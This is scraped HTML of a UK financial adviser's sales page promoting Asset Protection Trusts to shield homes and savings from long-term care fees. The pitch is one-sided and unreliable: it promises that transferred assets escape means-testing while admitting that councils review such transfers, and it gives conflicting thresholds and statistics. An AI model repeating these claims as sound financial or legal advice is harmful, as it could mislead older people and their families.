menu-item-object-custom menu-item-home menu-item-7671\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27\"><a href=\"/pensions\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\">Auto Enrolment Report</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pension-review\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\">Lost Pension</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"/investments\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor current-menu-ancestor current-menu-parent current-page-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-46\"><a href=\"/trusts\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-106 current_page_item menu-item-108\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672\"><a href=\"/about-us\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676\"><a href=\"/our-team\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677\"><a href=\"/about-us/testimonials\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680\"><a href=\"/terms-of-use\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681\"><a href=\"/privacy-policy\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682\"><a href=\"/cookies\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674\"><a href=\"/our-blog\">Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7678\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7678\"><a href=\"/resources\">Resources</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7675\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7675\"><a href=\"/contact-us\">Contact</a></li>&#13;\n			<li class=\"main-nav-search\">&#13;\n		<a id=\"nav-search-link\" class=\"search-link\"/>&#13;\n		<div id=\"nav-search-form\" class=\"main-nav-search-form\">&#13;\n			<form role=\"search\" id=\"searchform\" method=\"get\" action=\"/\">&#13;\n				<input type=\"text\" value=\"\" name=\"s\" id=\"s\"/><input type=\"submit\" id=\"searchsubmit\" value=\"\"/></form></div>&#13;\n	</li>&#13;\n	</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</div>&#13;\n</div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n										</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Asset Protection Trust										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"/trusts\" title=\"Trusts\">Trusts</a></li><li>Asset Protection Trust</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n					<div id=\"content\" style=\"float:right;\">&#13;\n				<div id=\"post-106\" class=\"post-106 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Asset Protection Trust</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/rs-r-admin\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<h1 style=\"text-align: center;\"><span style=\"text-decoration: underline;\">Asset Protection Trust</span></h1>&#13;\n<h2 style=\"text-align: center;\"><span style=\"color: #b23f38; font-family: arial,helvetica,sans-serif; font-size: x-large;\"><b>The Critical Factors That Decide Whether Or Not You Will Have To Pay For Long Term Care</b></span></h2>&#13;\n<p style=\"text-align: justify;\"/>&#13;\n<p style=\"text-align: center;\"><span style=\"font-size: large;\"> <em>What everyone needs to know about the devastating impact on their potential inheritance in order to pay for the long term needs of an elderly parent</em></span></p>&#13;\n<p style=\"text-align: justify;\"><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Did you know that every year in the UK</b><b> – 1 in 6 MEN and 1 in 4 WOMAN over 65 will go into care – <span style=\"text-decoration: underline;\">Are You Going To Be One Of Them?</span></b></span></p>&#13;\n<p style=\"text-align: justify;\"><span style=\"font-family: arial,helvetica,sans-serif;\">Are you determined to STOP THE local authority taking all your assets — <b>including your house</b> — to pay for care costs? With only your last <b>£14,500</b> protected NOW IS THE TIME TO ACT to ensure you continue to have a lifetime interest in your assets.</span></p>&#13;\n<div><span style=\"font-family: arial,helvetica,sans-serif;\"><span style=\"font-size: small;\">Are Care Home fees another financial scandal affecting one of the most vulnerable groups of people and exactly where do you stand?  </span><span style=\"font-size: small;\">For many it seems like a postcode lottery or is having a bit more knowledge enough to determine who pays what?</span></span>&#13;\n<div class=\"simple-grey-box\" style=\"margin: 5px auto 20px; width: 70%; text-align: center;\"><span style=\"font-family: arial,helvetica,sans-serif;\"><span style=\"font-size: small;\">The recently proposed changes sounded like a welcome relief to this very controversial issue but exactly how generous are they?</span></span></div>&#13;\n</div>&#13;\n<p style=\"text-align: justify;\"><span style=\"font-family: arial,helvetica,sans-serif;\">Are you <b>REALLY</b> serious about taking control of the LONG TERM PRESERVATION of your estate for your children and grandchildren?</span></p>&#13;\n<p style=\"text-align: justify;\"><span style=\"font-family: arial,helvetica,sans-serif;\">After paying taxes throughout our lives, you might expect that if required long term care will be provided if ever needed in later life. Unfortunately what most people do not realise to their cost – that its means tested.</span></p>&#13;\n<p style=\"text-align: justify;\"><span style=\"font-family: arial,helvetica,sans-serif;\">After taking into account your house and assets including any savings and amount to more than £23500, then you will be expected to pay for that care yourself less any free personal care allowances.</span></p>&#13;\n<p><span style=\"color: #993300; font-family: arial,helvetica,sans-serif; font-size: medium;\"><b>Care home funding is not cheap</b></span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\">With residential care costs running at <b>£25,000 to £50,000</b> every year; it will not take long for you hard earned savings to disappear entirely.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>So what are your options:-</b></span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><a href=\"#\"/>We would not recommend <b>doing nothing</b> and hope that your assets are not put at risk.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><a href=\"#\"/>There are stringent rules in place regarding transferring your assets to your family that could incur Capital Gains Tax. You may not wish to lose control if anything goes wrong including divorce or bankruptcy. Again, <b>we don’t recommend this.</b></span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><a href=\"#\"/>If your assets are transferred safely into an asset protection trust, they will not be included as part of your wealth. You`ll avoid your estate being used to cover care costs and your beneficiaries will receive their entire legacy.</span></p>&#13;\n<p><span style=\"color: #99cc00; font-family: arial,helvetica,sans-serif; font-size: medium;\"><span style=\"color: #993300;\">What are you doing to ensure you are one residential care home winners?</span> </span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\">Why not take the first step today to gain access to the knowledge and wisdom of Asset Protection Experts.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\">As one of U.K.’s most respected financial planning firms we are fully invested in our clients, meaning our insights and advice that will be clear, relevant, actionable and achievable, showing you in practicable steps how you can get there from here.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\">Call us today at <span class=\"rTapNumber13629\"/> for your free consultation or click the box below to have our asset protection trust expert call you at a time that suits.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\">All calls are handled discretely and we value your privacy.</span></p>&#13;\n<style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:f8f8f8 !important;border-width:1px;border-color:#f6f6f6!important;border-right, left, top or bottom-width:3px !important;border-right, left, top or bottom-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"\" class=\"continue button large default\">Book Now</a><h2>FREE Adviser Consultation</h2><p>Click the button to book yours now...</p><a href=\"/contact-us\" target=\"\" class=\"continue mobile-button button large default\">Book Now</a></section></div>&#13;\n<div class=\"simple-grey-box\" style=\"margin: 5px auto 20px; width: 70%;\">&#13;\n<h4 class=\"content-box-gray\" style=\"text-align: center;\"><span style=\"color: #808080; font-family: arial,helvetica,sans-serif; font-size: large;\"><b>More important information how you’re Assets are considered for Long Term Care?</b></span></h4>&#13;\n</div>&#13;\n<p style=\"text-align: left;\"><span style=\"font-family: arial,helvetica,sans-serif;\">A Doctor, in conjunction with the family, will decide whether you need long term care.</span></p>&#13;\n<p style=\"text-align: left;\"><span style=\"font-family: arial,helvetica,sans-serif;\">If you need nursing care, the Council must arrange for the care and they must pay for it.</span></p>&#13;\n<p style=\"text-align: left;\"><span style=\"font-family: arial,helvetica,sans-serif;\">The council has the right to try and recover these costs and they may try to do this. It is more difficult for them to recover costs as the assets are no longer in your name, but in the name of the Trust. The Solicitor Trustees will always deal with the Local Authority and respond to any challenge.</span></p>&#13;\n<p style=\"text-align: left;\"><span style=\"font-family: arial,helvetica,sans-serif;\">The Council will fund your care up to their maximum funding rate but the Care Homes normally settle for this amount instead of demanding the private rate.</span></p>&#13;\n<h2 style=\"text-align: left;\" align=\"center\"/>&#13;\n<table border=\"0\" cellspacing=\"1\" cellpadding=\"1\"><tbody><tr><td valign=\"top\" width=\"75\"/>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\"><span style=\"color: #99cc00;\">If your assets are greater than</span></p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\"><span style=\"color: #99cc00;\">If your assets are between</span></p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\"><span style=\"color: #99cc00;\">If your assets are below</span></p>&#13;\n</td>&#13;\n</tr><tr><td valign=\"top\" width=\"75\">&#13;\n<p align=\"center\"><span style=\"color: #99cc00;\">England</span></p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£23,250</p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£14,250 – £23,250</p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£14,250</p>&#13;\n</td>&#13;\n</tr><tr><td valign=\"top\" width=\"75\">&#13;\n<p align=\"center\"><span style=\"color: #99cc00;\">Wales</span></p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£23,250</p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£23,250 – £23,250</p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£23,250</p>&#13;\n</td>&#13;\n</tr><tr><td valign=\"top\" width=\"75\">&#13;\n<p align=\"center\"><span style=\"color: #99cc00;\">Scotland</span></p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£24,750</p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£15,250 – £24,750</p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£15,250</p>&#13;\n</td>&#13;\n</tr><tr><td valign=\"top\" width=\"75\">&#13;\n<p align=\"center\"><span style=\"color: #99cc00;\">N. Ireland</span></p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£23,250</p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£14,250- £23,250</p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">£14,250</p>&#13;\n<p align=\"center\">&#13;\n</p></td>&#13;\n</tr><tr><td valign=\"top\" width=\"75\"/>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">You will be told you have to pay for Care. However, you may not have been told that you could be eligible for <a title=\"How to claim NHS Continuing Healthcare\" href=\"http://www.caretobedifferent.co.uk/paying-care-home-fees/nhs-continuing-healthcare/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-article\',\'http://www.caretobedifferent.co.uk\']);\" target=\"_blank\">free NHS Continuing Healthcare</a></p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">You will be told to pay for some of your care.</p>&#13;\n</td>&#13;\n<td valign=\"top\" width=\"154\">&#13;\n<p align=\"center\">Your local authority will pay for your care, but will still take a proportion of your income</p>&#13;\n</td>&#13;\n</tr></tbody></table><p> </p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Apart from care costs, the Asset Protection Trust has other big advantages. </b></span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\">It will avoid <i>Executory</i> procedure on your death and save money.</span></p>&#13;\n<ol><li><span style=\"font-family: arial,helvetica,sans-serif;\">If most of your assets are in the trust then there will be no Executory Costs and your estate can be paid over to your beneficiaries without delay, usually within a couple of weeks.</span></li>&#13;\n<li><span style=\"font-family: arial,helvetica,sans-serif;\">On death, estates normally cannot be paid out within the first 6 months, and can take up to two years to complete. Assets in a Trust are paid out immediately.</span></li>&#13;\n<li><span style=\"font-family: arial,helvetica,sans-serif;\">Even if you have a mortgage on your property which you do not want to pay off, then we can, in some cases, still set up a Assets Protection Trust, as long as the lender agrees.</span></li>&#13;\n</ol><p><span style=\"font-family: arial,helvetica,sans-serif;\">To find out more about Asset Protection Trusts and to get the advice you need, then please contact us on our free phone number <span class=\"rTapNumber13629\"> </span>to get started with your FREE complimentary review.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"> </span></p>&#13;\n<p><span style=\"color: #99cc00; font-family: arial,helvetica,sans-serif;\"><b>Asset Protection Trust FAQ:</b></span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Why is it important? </b></span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\">If the time comes when you do need to go into care, you may find that the assets like your home that’s taken a lifetime to accumulate, can be used for the cost of care rather than going directly to your beneficiaries.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>My family will take of me</b> – Lots of things can change in your lifetime – we are seeing more children become dependent on their parents again due to the economic climate – it may never happen but the current fact speak for themselves that 1 in 4 men and 1 in 3 women unfortunately have to go into care when they are over 65.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Will I get any benefit from it?</b> – Like all things in life it is about making a plan for the eventuality – if the result can save you a significant sum in care costs then it is obviously worth it. Saving on expensive legal probate costs will be of value also.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>What if I don’t go into care?</b> – Winding up your estate can be costly and time consuming so you will see the benefit by avoiding the in the costs and difficulty involved, in winding up your estate. A solicitor needs appointed when you die to carry out the necessary executory work particularly if the house is in your name and can be expensive. However if you have taken the right steps and you have appointed you home to the Trust then you will find that the Trustees can complete things quickly and efficiently on your behalf.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>What is the Solicitors role? – </b>Keeping control as a Trustee will be important for you, so if you need to make any key changes or decisions about the Trust your appointed solicitor will always be on your side providing more peace of mind that you can’t be outvoted.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Can I trust the Solicitors? </b>- Solicitors have a duty of care and are bound by the laws of their profession by The Law Society in England and Wales and also The Law Society of Scotland and they cannot benefit from the Trust directly as named beneficiaries.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>What are the ongoing fees and costs? – </b>There are NO ongoing fees. With this scheme you pay the fee to set up the Trust at the outset and have nothing further to pay unless you go into care and there is a dispute with the Council, which is very rare.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>What kinds of assets can be placed in the Trust? </b>- You are not means tested by the local authority on any capital up to £14500 and is ignored – you will tend to look first at other assets like your house, we will advice you on what would be best suited to being allocated to your Trust.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Can other assets be added at a later date? </b>- You can, as assets can be placed in the trust at a later although, this will start the 6 month clock ticking on that particular asset.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Is there any limit on the value of assets placed with the Trust? </b>- The Asset Protection Trust will usually hold assets up to the value of the current Nil Rate Band (£325,000 for the tax year 2010/11) for each client, as any assets in excess of this would create an immediate charge to lifetime Inheritance Tax of 40%. There are however a number of other options to safeguard your assets if 2 Trusts do not cover your entire estate.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>When is the best time to set up the Trust?</b> – We would recommend as quickly as possible after you have considered all you options. You will always be under scrutiny from Local Authorities to look back and review the circumstances in which a Family Protection Trust was set up at any time. You will have less to worry about if it was apparent you had expectation in entering long term care.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Can I change my mind?</b> – You have control so if anything changes you will have the choice for everything to revert to the way it was in your name only.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Can I move house? </b>- Yes, since you control the Trust you can move house in the usual way except that the deeds are signed by all the Trustees rather than by you alone; but that makes no difference.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>What happens if one of us dies? </b>- Nothing. The Trust, and the protection that is provides, simply continues as before until the second person dies. The survivor continues to retain control of the Trust.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>What happens if one of the other Trustees die?</b> – A new Trustee is simply assumed in their place.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\"><b>Who gets my estate when I die?</b> – You will decide you your named beneficiaries are in your Will and letter of wishes. The Trustees will then look to execute your wishes in a timely fashion. Having two Solicitor Trustees ensures this happens quickly and efficiently.</span></p>&#13;\n<p><span style=\"font-family: arial,helvetica,sans-serif;\">To find out more about Asset Protection Trusts and to get the advice you need, then please contact us on our free phone number <span class=\"rTapNumber13629\"/> to get started with your FREE complimentary review.</span></p>&#13;\n							</div>&#13;\n					</div>&#13;\n			</div>&#13;\n	<div id=\"sidebar\" style=\"float:left;\">&#13;\n		<ul class=\"side-nav\"><li><a href=\"/trusts\" title=\"Back to Parent Page\">Trusts</a></li>&#13;\n						<li class=\"page_item page-item-109\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n<li class=\"page_item page-item-106 current_page_item\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n<li class=\"page_item page-item-111\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n<li class=\"page_item page-item-141\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n<li class=\"page_item page-item-144\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n					</ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-4\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">Stock Market Bulletin – February 2017</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/better-pension-drawdown-annuity\">Which is Better Pension Drawdown or Annuity?</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/5-powerful-reasons-review-critical-illness-insurance\">5 Powerful Reasons To Review Your Critical illness Insurance</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/seven-deadly-investment-sins\">The Seven Deadly Investment Sins</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>Established for over 20 years we work with individuals, families and owner managed businesses countrywide, helping them organise; plan; protect and achieve the future they choose, through \"hands on\" objective and realistic financial advice.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n								<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n								<a href=\"/\" title=\"A Guide To Investment – Different Ways To Grow &amp; Protect Your Wealth\">&#13;\n					</a>&#13;\n								<a href=\"/portfolio-items/a-guide-to-protection-planning\" title=\"A Guide To Protection Planning\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col last\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"/feed\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul><div style=\"clear:both;\"/></div>				</article></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is 